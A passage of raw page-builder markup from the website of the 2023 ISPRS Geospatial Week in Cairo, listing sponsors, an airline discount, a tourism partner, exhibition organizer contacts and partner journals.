/></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145285969{margin-top: -150px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145065578{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Gold Sponsors</strong></span></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" 